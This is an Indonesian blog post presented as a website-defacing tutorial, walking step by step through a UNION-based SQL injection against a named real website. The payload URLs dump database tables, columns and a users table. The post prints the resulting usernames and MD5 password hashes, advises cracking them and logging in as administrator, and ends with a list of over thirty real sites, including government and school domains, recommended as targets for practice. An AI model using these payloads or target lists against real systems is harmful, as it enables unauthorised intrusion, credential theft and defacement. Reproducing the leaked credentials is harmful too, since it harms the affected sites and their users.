Selasa, 23 Maret 2010

Teknik dan Trik Cara Deface

Apa itu deface?? Deface adalah teknik mengganti atau menyisipkan file pada server, teknik ini dapat dilakukan karena
terdapat lubang pada sistem security yang ada di dalam sebuah aplikasi. Nah berikut Teknik dan Trik Deface
maaf yah kalo trik yg saya gunakan ada yang sam denga teknik orang lain.......

but ne salah satu cara ngedeface web.........
langkah2 nya adalah:
1. Langkah pertama, Cari halaman pada website yang menampilkan sebuah informasi dari database…
http://www.catun.info/profile_view.php?id=113

2. Tes Vuln-nya dengan menambahkan tanda petik (’) pada akhir address…

http://www.catun.info/profile_view.php?id=113′

Browser akan menampilkan pesan error, itu tandanya website tersebut memiliki vuln SQL Injection…

3. Selanjutnya kita akan cari tau seberapa banyak colom dari tabel yang di tampilkan pada halaman tersebut, dengan cara menambahkan order by 1 — pada akhir brwser…
http://www.catun.info/profile_view.php?id=113%20order%20by%201%20– Jalan normal

ganti dengan angka 20
http://www.catun.info/profile_view.php?id=113%20order%20by%2020%20– Error, ini tandanya jumlah kolom tidak sampai 20

ganti dengan angka 17
http://www.catun.info/profile_view.php?id=113%20order%20by%2017%20– Jalan normal

ganti dengan angka 18
http://www.catun.info/profile_view.php?id=113%20order%20by%2018%20– Error

Ini menginformasikan bahwa jumlah kolom yang ditampilkan adalah 17…

4. Selanjutnya kita gunakan perinta union select untuk menggabungkan informasi yang ditampilkan pada halaman website…. sebelumnya tambahkan - pada angka 113…

http://www.catun.info/profile_view.php?id=
-113%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17–


Akan tampil angka yang di posisikan sesuai dengan urutan kolom sebenarnya….

5. Cek versi dengan mengetik version() pada sembarang angka pada addres bar…

http://www.catun.info/profile_view.php?id=-113%20union%20select%201,
version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17–


tampil 5.0.51a-log, versi ini mendukung informartion_schema yang berguna untuk menampilkan isi tabel pada database…

6. Selanjutnya mengeluarkan isi tabel pada database… ganti version() dengan group_concat(table_name) dan tambahkan from information_schema.tables where table_schema=database()– pada akhir alamat

http://www.catun.info/profile_view.php?id=-113%20union%20select%201,
group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,
17%20from%20information_schema.tables%20where%20table_schema=database()–


akan tampil nama table disitu, disini kita coba cari tabel yang kira-kira menyimpan informasi tentang user login… terdapat sebuah tabel dengan nama users, selnjutnya kita akan tampilkan field2 yang ada pada tabel tersebut… ganti group_concat(table_name) dengan group_concat(column_name) dan ganti from information_schema.tables where table_schema=database()– dengan from information_schema.columns where table_name=0×7573657273–

Sebelumnya ubah nama tabel ke dalam bentuk hexa, gunakan website berikut untuk melakukannya http://www.swingnote.com/tools/texttohex.php jangan lupa tambahkan karakter 0x

http://www.catun.info/profile_view.php?id=
-113%20union%20select%201,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,
15,16,17%20from%20information_schema.columns%20where%20table_name=0×7573657273–


akan keluar nama2 kolom pada tabel user :D

7. Selanjutnya kita akan mengeluarkan isi dari tabel tersebut, pilih kolom2 yang menurut kita penting saja….

http://www.catun.info/profile_view.php?id=
-113%20union%20select%201,group_concat(name,0×20,pass,0×20),3,4,5,6,7,8,9,10,11,
12,13,14,15,16,17%20from%20users–


Disini saya tampilkan isi pada kolom name dan pass, yang berarti username dan password untuk login pada site tersebut.. untung2 kita bisa dapat login sebagai administrator….

hasilnya akan di keluar seperti ini….

admin c9fd3192ea0807efb3cf0bd6d564cc41 ,iuiu c9fd3192ea0807efb3cf0bd6d564cc41 ,orre fd41e12d031c2ed6cf888638e66be4de ,guest c9fd3192ea0807efb3cf0bd6d564cc41 ,test c9fd3192ea0807efb3cf0bd6d564cc41 ,ghost9 f8162c4552f8d85f76bd4633b00c5a98 ,calin c9fd3192ea0807efb3cf0bd6d564cc41 ,ggg c9fd3192ea0807efb3cf0bd6d564cc41 ,bandit 3335e92c15a9e0ba515c0219fb6b4f67 ,Jeff Boy 16bdcbc8fcf5533f54f64ff9c05bbf5e ,Karina 8c70e53caf96823e292f6264276c9223 ,k1d0 d3018d3ccd01d717e6eb7760bdde3ab2 ,braty e28e9b2242e579f40bc78d08628c7297 ,creaM 2e970e822e1a8834203d06abb60f59ec ,speed c9fd3192ea0807efb3cf0bd6d564cc41 ,scooter c9fd3192ea0807efb3cf0bd6d564cc41 ,beciy 62b2b4b303264f138ba96ea3de80d1cc ,Catazx 63b4ec64d4a085d6172552b90badc5ba ,DarKPrince 77ec4b0ae3815a1b2e12910db3291df6 ,icsulescu f63ed3300797216784db8387a2deaff0 ,Flower ac8adb4331dbfd804f2ba21720888830 ,ExTaSy 3f5f252123b8f5ee4211bc1f9088534c ,alin00 0cc175b9c0f1b6a831c399e269772661 ,crisz 0cc175b9c0f1b6a831c399e269772661 ,xall c9fd3192ea0807efb3cf0bd6d564cc41

Password di simpan dalam bentuk MD5, silahkan cari website yang menyediakan fasilitas untuk mendecryptnya,,, hehe sebenarnya bukan mendecrypt karena MD5 tidak dapat di kembalikan ke bentuk semulanya, website tersebut menyediakan database MD5 yang nantinya akan di cocokkan dengan hash yang kita miliki untuk kemudian ditampilkan plain textnya….

Setelah kita berhasil mendapatkan user name dan password yang benar, Cari tempat untuk melakukan login dan masuk sebagai administrator menggunakan username dan password yang kita miliki……

Sekian tutorial singkat saya mengenai SQL Injection, bila kurang jelas silahkan ditanyakan, InsyaAllah akan saya jawab bila saya mampu menjawabnya…. :D
dan untuk latihan, berikut saya lampirkan website2 yang memiliki vuln SQL Injection….

http://www.statebank1898.com/news.asp?id=1

http://www.ssm.com.my/en/berita/news.php?id=57

http://www.blitzone.com.my/cybercafe/show-news.php?id=5

http://www.bohol.ph/article.php?id=110

http://www.klife.com.my/gallery.php?id=9

http://www.nbbnet.gov.my/BioArticle/article.php?id=305

http://www.westmont.com.my/project-show.php?id=28

http://www.viewsonic.com.my/my/pr/show.php?id=8

http://www.catun.info/profile_view.php?id=113

http://lin-online.web.id/product.php?id=1

http://fotografix.ca/viewPhoto.php?id=455

http://www.mirthandbeauty.com/mirth/vie … php?id=592

http://pcklab.com/viewphoto.php?id=15

http://www.campandfish.com.au/members/p … .php?id=25

http://theatreview.org.nz/reviews/review.php?id=1988

http://www.pchardware.ro/Reviews/review.php?id=182

http://www.dvdfuture.com/review.php?id=815

http://www.alsofwah.or.id/index.php?pil … dits&id=81

http://www.kraak.net/en/releases.php?ID=31

http://press.letsgohonduras.com/releases.php?id=39

http://www.naturetrust.bc.ca/releases.php?id=5

http://www.popboomerang.com/releases.php?id=4

http://www.videoezy.co.id/detail.php?movie=563

http://www.proton-edar.com.my/index.php … view&id=42

http://tpc.moh.gov.my/modules/tinyevent … show&id=16

http://www.irelandpakistan.com/gallery.php?id=51

http://www.magetan.go.id/next.php?id=1

http://www.central-jkt.sch.id/detail_news.php?id=27

http://www.sevilla.sch.id/detail_news.php?id=29

http://www.smkti-baliglobal.sch.id/bali … s.php?id=3

http://benuamobil.com/detail.php?id=39

selamat mencoba dan banyak mencoba-coba ya..........

0 komentar: